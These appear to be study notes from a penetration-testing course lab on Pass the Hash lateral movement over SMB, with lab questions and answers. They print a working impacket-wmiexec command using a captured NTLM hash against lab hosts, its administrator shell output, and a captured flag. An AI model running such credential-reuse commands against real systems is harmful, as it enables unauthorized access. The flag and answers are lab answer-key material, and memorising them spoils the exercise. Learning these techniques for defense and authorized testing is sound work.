Topics: PassTheHash
# Questions
Start VM Group 1 and repeat the steps discussed in this section. Which TCP port needs to be enabled on the target machine in order for the pass the hash technique to work?
# Answer
445

# The Pass the Hash (PtH) technique allows an attacker to authenticate to a remote system or service using a user's NTLM hash instead of the user's plaintext password. Note that this will only work for servers or services using NTLM authentication, not for servers or services using Kerberos authentication.

# Many third-party tools and frameworks use PtH to allow users to both authenticate and obtain code execution, including:
- PsExec from Metasploit
- Passing-the-hash toolkit
- Impacket

# The mechanics behind them are more or less the same in that the attacker connects to the victim using the Server Message Block (SMB) protocol and performs authentication using the NTLM hash. Most tools that are built to abuse PtH can be leveraged to start a Windows service (for example, cmd.exe or an instance of PowerShell) and communicate with it using Named Pipes. This is done using the Service Control Manager API.

# First, it requires an SMB connection through the firewall (commonly port 445), and second, the Windows File and Printer Sharing feature to be enabled. These requirements are common in internal enterprise environments.

# This lateral movement technique also requires the admin share called ADMIN$ to be available. To establish a connection to this share, the attacker must present valid credentials with local administrative permissions. In other words, this type of lateral movement typically requires local administrative rights.

# To demonstrate this, we can use wmiexec from the Impacket suite from our local Kali machine against the local administrator account on FILES04. We are going to invoke the command by passing the local Administrator hash that we gathered in a previous Module and then specifying the username along with the target IP.

/usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.195.73

C:\>whoami
files04\administrator
C:\>hostname
FILES04

# We used NTLM authentication to obtain code execution on the Windows 2022 server directly from Kali, armed only with the user's NTLM hash.

# This method works for Active Directory domain accounts and the built-in local administrator account. However, due to the 2014 security update, this technique can not be used to authenticate as any other local admin account.

# Questions 2
Start VM Group 2 and try to execute the pass the hash technique to move laterally to web04 to get the flag located on the administrator's desktop.
# Answer
OS{531eb7c141ebc9f49b5de9306a783543}

/usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.195.72

C:\Users\Administrator\Desktop>type flag.txt
OS{531eb7c141ebc9f49b5de9306a783543}